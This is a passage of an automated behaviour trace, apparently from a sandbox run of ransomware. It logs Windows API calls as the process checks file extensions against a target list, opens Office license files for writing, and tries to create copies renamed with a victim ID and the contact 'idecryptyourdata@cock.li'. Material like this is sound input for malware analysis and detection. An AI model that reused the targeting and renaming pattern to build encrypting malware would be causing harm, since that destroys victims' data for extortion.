[0164.134] lstrlenW (lpString=".pdf") returned 4 [0164.134] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".xls") returned 4 [0164.134] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".xlsx") returned 5 [0164.134] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.135] lstrlenW (lpString=".ppt") returned 4 [0164.135] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.135] lstrlenW (lpString=".zip") returned 4 [0164.135] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString=".rar") returned 4 [0164.135] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString=".bz2") returned 4 [0164.135] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString=".7z") returned 3 [0164.135] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.135] lstrlenW (lpString=".dbf") returned 4 [0164.135] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.135] lstrlenW (lpString=".1cd") returned 4 [0164.135] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.135] lstrlenW (lpString=".jpg") returned 4 [0164.135] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.135] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.135] lstrlenW (lpString="PowerPointR_Grace-ul-oob.xrm-ms") returned 31 [0164.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.136] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=11614) returned 1 [0164.136] CloseHandle (hObject=0x434) returned 1 [0164.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms")) returned 0x220 [0164.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.137] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.137] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.137] CloseHandle (hObject=0x434) returned 1 [0164.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.137] lstrlenW (lpString=".doc") returned 4 [0164.137] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".docx") returned 5 [0164.138] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.138] lstrlenW (lpString=".pdf") returned 4 [0164.138] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".xls") returned 4 [0164.138] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".xlsx") returned 5 [0164.138] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.138] lstrlenW (lpString=".ppt") returned 4 [0164.138] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.138] lstrlenW (lpString=".zip") returned 4 [0164.138] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".rar") returned 4 [0164.138] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".bz2") returned 4 [0164.138] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString=".7z") returned 3 [0164.138] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.138] lstrlenW (lpString=".dbf") returned 4 [0164.138] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.138] lstrlenW (lpString=".1cd") returned 4 [0164.138] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.138] lstrlenW (lpString=".jpg") returned 4 [0164.139] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.139] lstrlenW (lpString=".doc") returned 4 [0164.139] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".docx") returned 5 [0164.139] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.139] lstrlenW (lpString=".pdf") returned 4 [0164.139] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".xls") returned 4 [0164.139] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".xlsx") returned 5 [0164.139] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.139] lstrlenW (lpString=".ppt") returned 4 [0164.139] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.139] lstrlenW (lpString=".zip") returned 4 [0164.139] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".rar") returned 4 [0164.139] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".bz2") returned 4 [0164.139] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.139] lstrlenW (lpString=".7z") returned 3 [0164.139] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.139] lstrlenW (lpString=".dbf") returned 4 [0164.139] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.140] lstrlenW (lpString=".1cd") returned 4 [0164.140] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms") returned 81 [0164.140] lstrlenW (lpString=".jpg") returned 4 [0164.140] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.140] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.140] lstrlenW (lpString="PowerPointR_OEM_Perp-pl.xrm-ms") returned 30 [0164.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.141] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=10655) returned 1 [0164.141] CloseHandle (hObject=0x434) returned 1 [0164.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms")) returned 0x220 [0164.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.141] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.141] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.142] CloseHandle (hObject=0x434) returned 1 [0164.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.142] lstrlenW (lpString=".doc") returned 4 [0164.142] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.142] lstrlenW (lpString=".docx") returned 5 [0164.142] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.142] lstrlenW (lpString=".pdf") returned 4 [0164.142] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.142] lstrlenW (lpString=".xls") returned 4 [0164.142] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString=".xlsx") returned 5 [0164.143] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.143] lstrlenW (lpString=".ppt") returned 4 [0164.143] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString=".zip") returned 4 [0164.143] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString=".rar") returned 4 [0164.143] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString=".bz2") returned 4 [0164.143] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString=".7z") returned 3 [0164.143] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString=".dbf") returned 4 [0164.143] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString=".1cd") returned 4 [0164.143] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString=".jpg") returned 4 [0164.143] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.143] lstrlenW (lpString=".doc") returned 4 [0164.143] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.143] lstrlenW (lpString=".docx") returned 5 [0164.144] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.144] lstrlenW (lpString=".pdf") returned 4 [0164.144] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString=".xls") returned 4 [0164.144] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString=".xlsx") returned 5 [0164.144] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.144] lstrlenW (lpString=".ppt") returned 4 [0164.144] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.144] lstrlenW (lpString=".zip") returned 4 [0164.144] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString=".rar") returned 4 [0164.144] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString=".bz2") returned 4 [0164.144] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString=".7z") returned 3 [0164.144] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.144] lstrlenW (lpString=".dbf") returned 4 [0164.144] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.144] lstrlenW (lpString=".1cd") returned 4 [0164.144] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms") returned 80 [0164.144] lstrlenW (lpString=".jpg") returned 4 [0164.144] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.145] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.145] lstrlenW (lpString="PowerPointR_OEM_Perp-ppd.xrm-ms") returned 31 [0164.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.145] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=20784) returned 1 [0164.146] CloseHandle (hObject=0x434) returned 1 [0164.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms")) returned 0x220 [0164.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.146] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.146] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.147] CloseHandle (hObject=0x434) returned 1 [0164.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms") returned 81 [0164.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms") returned 81 [0164.147] lstrlenW (lpString=".doc") returned 4 [0164.147] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".docx") returned 5 [0164.147] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.147] lstrlenW (lpString=".pdf") returned 4 [0164.147] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".xls") returned 4 [0164.147] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".xlsx") returned 5 [0164.147] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.147] lstrlenW (lpString=".ppt") returned 4 [0164.147] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms") returned 81 [0164.147] lstrlenW (lpString=".zip") returned 4 [0164.147] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".rar") returned 4 [0164.147] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".bz2") returned 4 [0164.147] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.147] lstrlenW (lpString=".7z") returned 3 [0164.147] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms") returned 81 [0164.148] lstrlenW (lpString=".dbf") returned 4 [0164.148] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.148] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.148] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.148] CloseHandle (hObject=0x434) returned 1 [0164.580] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.580] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.581] CloseHandle (hObject=0x434) returned 1 [0164.581] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.581] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.582] CloseHandle (hObject=0x434) returned 1 [0164.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.582] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.582] CloseHandle (hObject=0x434) returned 1 [0164.583] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.583] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.583] CloseHandle (hObject=0x434) returned 1 [0164.584] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.584] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.584] CloseHandle (hObject=0x434) returned 1 [0164.585] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.585] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.586] CloseHandle (hObject=0x434) returned 1 [0164.586] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: 